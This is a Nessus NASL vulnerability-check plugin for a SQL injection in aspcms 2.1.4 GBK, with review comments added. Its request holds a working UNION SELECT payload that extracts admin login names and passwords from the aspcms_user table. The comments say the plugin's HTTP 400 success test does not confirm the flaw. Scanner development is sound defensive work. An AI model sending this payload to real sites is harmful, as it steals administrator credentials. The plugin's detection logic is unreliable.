nessus注射模块

#
# NASL, Inc.
#

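include("compat.inc");

# Registration block: executed only when the scanner loads the plugin to read
# its metadata (description is set). It registers the plugin and exits before
# any request is sent. The typographic quotes from the published listing are
# restored to ASCII quotes so the interpreter can parse the strings.
if (description)
{
  script_id(90029);
  script_version("$Revision: 1.0 $");

  name["english"] = "check aspcms2.1.4GBK SQL Injection security hole";
  script_name(english:name["english"]);

  desc["english"] = "check aspcms2.1.4GBK SQL Injection security hole";
  script_description(english:desc["english"]);

  # NOTE(review): the summary holds an author name, not a description of the
  # check; kept as published.
  script_summary(english:"john");

  # The check sends a UNION SELECT payload to an admin page, so it is an active
  # test rather than passive information gathering. Operators rely on the
  # category to judge how intrusive a plugin is, so it is declared ACT_ATTACK.
  script_category(ACT_ATTACK);

  script_copyright(english:"This script is Copyright (C) 2011 by john");
  family["english"] = "goingdown john";
  script_family(english:family["english"]);

  # Run after service discovery so that Services/www is populated.
  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}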
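include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Resolve the web port from the scanner's knowledge base (falling back to 80).
# The published script sent the request to a hard-coded port 80 but reported
# against an undefined variable `port`, so the finding was attached to no port.
port = get_http_port(default:80);

# Request under test, kept exactly as published.
# NOTE(review): the payload selects loginname and password from aspcms_user.
# A detection plugin should confirm the flaw with a harmless marker instead of
# reading credentials from the target.
str1 = "/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1";
r1 = http_send_recv3(method:"GET", item:str1, port:port);

# The original display(r1) / display(r1[2]) calls are removed: they ran before
# the NULL check and would copy the raw response body (which may contain the
# selected credential columns) into the scan output.

# No response at all: nothing to evaluate.
if (isnull(r1))
  exit(0);

# NOTE(review): `>!<` is the "is not a substring of" operator, so the two tests
# below let the script continue only when the response IS an HTTP 400 with the
# "badly formed" body. A 400 means the server rejected the request, so this
# condition does not demonstrate SQL injection and a report from this plugin
# should be treated as unconfirmed. The condition is kept as published because
# the page does not show what a vulnerable response looks like; validate
# against a known-patched and a known-vulnerable instance before relying on it.
# NOTE(review): r1 is the array returned by http_send_recv3; confirm what
# string() yields for it, or match the status line element directly.
if ("HTTP/1.1 400 Bad Request" >!< string(r1))
  exit(0);

if ("HTTP Error 400. The request is badly formed." >!< string(r1[2]))
  exit(0);

# exit() replaces the original top-level return(0): there is no enclosing
# function to return from at script level.
security_hole(port);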

 
